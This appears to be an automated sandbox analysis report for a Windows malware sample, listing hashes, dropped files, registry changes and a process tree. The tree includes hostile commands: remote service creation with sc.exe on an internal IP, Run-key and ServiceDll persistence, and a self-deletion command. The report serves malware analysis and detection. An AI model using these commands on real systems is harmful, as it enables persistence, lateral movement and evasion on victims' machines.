Analysis
-
max time kernel
150s -
max time network
139s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
14-09-2024 17:10
Static task
static1
Behavioral task
behavioral1
Sample
e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe
-
Size
173KB
-
MD5
e0a4c416bbb658e011e091c81794b3bc
-
SHA1
d4551ec2fe27c7360693ebb09e3146277851bcfc
-
SHA256
8e44a2ee84c0389566dd91dfe128f87d867ff666b2d258620c9af4a4d27f1780
-
SHA512
cdcc2149508bedeabf65b2397bbf062ddad9cf21693b5272cdc7f65b7c92c9c2ada221da5197c6c1ddb3228200c8829783cd35a20343052e6d4dd44db0bfe81d
-
SSDEEP
3072:B3dqtinIZYCQjEZB9fAlUGaqWOoOmE3zHN8+nNvwQ9v3QGJI20FgKeYf3iBh9iGQ:B3dqqkQjEZB9fACGaqPoOmE3zHZNv9o3
Malware Config
Signatures
-
Creates new service(s) 2 TTPs
-
Server Software Component: Terminal Services DLL 1 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Parameters\ServiceDll = "C:\\Progra~1\\%Program Files%\\1029.URL" rundll32.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\AppMgmt\Parameters\ServiceDll = "C:\\Progra~1\\%Program Files%\\1029.URL" laass.exe -
Deletes itself 1 IoCs
pid Process 2164 cmd.exe -
Executes dropped EXE 1 IoCs
pid Process 3064 laass.exe -
Loads dropped DLL 7 IoCs
pid Process 1912 rundll32.exe 2084 cmd.exe 2084 cmd.exe 2084 cmd.exe 2084 cmd.exe 2084 cmd.exe 3064 laass.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "file:C:\\Progra~1\\%Progr~1\\DEST.BAT" rundll32.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "file:C:\\Progra~1\\%Progr~1\\DEST.BAT" laass.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Progra~1\%Program Files%\laass.exe e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe File created C:\Progra~1\%Program Files%\Cest.bat e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe File created C:\Progra~1\%Program Files%\1029.URL e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe File opened for modification C:\Progra~1\%Program Files%\1029.URL e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe File created C:\Progra~1\%Program Files%\1031.URL e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe File opened for modification C:\Progra~1\%Program Files%\1031.URL e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe File created C:\Progra~1\%Program Files%\Dest.BAt e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe -
Launches sc.exe 2 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2704 sc.exe 2736 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language laass.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1912 rundll32.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe 3064 laass.exe 1912 rundll32.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1912 rundll32.exe 3064 laass.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeIncBasePriorityPrivilege 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 2316 wrote to memory of 2084 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 31 PID 2316 wrote to memory of 2084 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 31 PID 2316 wrote to memory of 2084 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 31 PID 2316 wrote to memory of 2084 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 31 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 1912 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 33 PID 2316 wrote to memory of 2164 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 34 PID 2316 wrote to memory of 2164 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 34 PID 2316 wrote to memory of 2164 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 34 PID 2316 wrote to memory of 2164 2316 e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe 34 PID 2084 wrote to memory of 2736 2084 cmd.exe 35 PID 2084 wrote to memory of 2736 2084 cmd.exe 35 PID 2084 wrote to memory of 2736 2084 cmd.exe 35 PID 2084 wrote to memory of 2736 2084 cmd.exe 35 PID 2084 wrote to memory of 2704 2084 cmd.exe 36 PID 2084 wrote to memory of 2704 2084 cmd.exe 36 PID 2084 wrote to memory of 2704 2084 cmd.exe 36 PID 2084 wrote to memory of 2704 2084 cmd.exe 36 PID 2084 wrote to memory of 3064 2084 cmd.exe 37 PID 2084 wrote to memory of 3064 2084 cmd.exe 37 PID 2084 wrote to memory of 3064 2084 cmd.exe 37 PID 2084 wrote to memory of 3064 2084 cmd.exe 37
Processes
-
C:\Users\Admin\AppData\Local\Temp\e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\e0a4c416bbb658e011e091c81794b3bc_JaffaCakes118.exe"1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Progra~1\%Program Files%\Dest.bat""2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2084 -
C:\Windows\SysWOW64\sc.exesc \\10.127.0.245 create "WinAudio" binpath= "cmd.exe /c C:\PROGRA~1\%PROGR~1\Cest.bat" start= auto type= interact type= own displayname= "WinAudio"3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2736
-
-
C:\Windows\SysWOW64\sc.exesc \\10.127.0.245 config "WinAudio" binpath= "cmd.exe /c C:\PROGRA~1\%PROGR~1\Cest.bat" start= auto type= interact type= own obj= localsystem password= ""3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2704
-
-
C:\Program Files\%Program Files%\laass.exe"C:\Program Files\%Program Files%\laass.exe" 1031.URL main3⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:3064
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" 1031.URL main2⤵
- Server Software Component: Terminal Services DLL
- Loads dropped DLL
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:1912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c del C:\Users\Admin\AppData\Local\Temp\E0A4C4~1.EXE > nul & rd c:\%Progr~1 > nul2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:2164
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Server Software Component
1Terminal Services DLL
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
13.1MB
MD500f3ec32ecfda8d4f68cc8bac2cbffbb
SHA1e59d640a73c52ad2a4a084d267ee8d1bd3f17655
SHA256346b2810f4a3cbd8619e27df48733c0bf0e093b7f9b70318df48631a62e8b892
SHA5125144b21d92649a58a901fb9ffec6ab1a22115e791f637c2935c4d348fa2d95e0ec349d6cafb61cb25c298f041f8a3368189e7afc55f435a29fa015984246c0fa
-
Filesize
2KB
MD5cc80f365c38fa2206b471c4d6305bff3
SHA140e52e538f9009a0c857e8f38ecbbfa20db9ffbb
SHA256c33fe6e49349296adcc280b48bcb96dc092c08e7f53d816fdfdf0f2024a1ed38
SHA512d8d916cf67a47ec6846b4727d5095e298a7c59178e62d59eeed6646f9ea13c0289598230849b27dae699dd0b1aa3041e31f23c902c42e7d53b534f4aaa42adc5
-
Filesize
9KB
MD5359c541c07a39ab11bb45aad29b2d2ce
SHA13c4f277f184ae306a4d0efe1bcb9e03ecabbb9b7
SHA2566e2378348ebebf5b301744fedb0be396ef4e7e92ad94877da79eed9eb46850d5
SHA512768050272dd4875a4c2a6a96f6337334c05d1512dfc0cc9ceee883a7c701de5e2e90872a6f9029de5b528b74c07cb8aa61c10f9f9e834f8021e9759136fcfbff